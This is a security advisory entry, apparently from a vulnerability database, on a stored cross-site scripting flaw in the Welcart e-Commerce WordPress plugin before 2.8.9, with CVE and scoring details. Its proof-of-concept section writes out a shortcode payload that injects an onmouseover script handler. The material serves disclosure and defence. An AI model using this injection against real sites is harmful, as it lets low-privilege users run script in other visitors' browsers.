Lucene search
Lana CodesWPVDB-ID:A1C70C80-E952-4CC7-ACA0-C2DDE3FA08A9HistoryDec 23, 2022 - 12:00 a.m.
Welcart e-Commerce < 2.8.9 - Contributor+ Stored XSS via Shortcode
2022-12-2300:00:00
Lana Codes
wpscan.com
9
welcart e-commerce
stored xss
shortcode
contributor
cross-site scripting
0.001 Low
EPSS
Percentile
23.5%
The plugin does not validate and escapes one of its shortcode attributes, which could allow users with a role as low as a contributor to perform a Stored Cross-Site Scripting attack.
PoC
1. Add a product item to the plugin. The item name, for example, “first”. You will also use this in the shortcode. 2. Exploit shortcode: [button_to_cart item=‘first’ value=‘SUBMIT" onmouseover=“alert(1)” style=“border:5px solid red;”’]
| CPE | Name | Operator | Version |
|---|---|---|---|
| usc-e-shop | lt | 2.8.9 |
Related
cve
cve
CVE-2022-4655
2023-01-16 16:15:13
prion
prion
Cross site scripting
2023-01-16 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-4655
2023-01-16 16:15:13
wpexploit
wpexploit
Welcart e-Commerce < 2.8.9 - Contributor+ Stored XSS via Shortcode
2022-12-23 00:00:00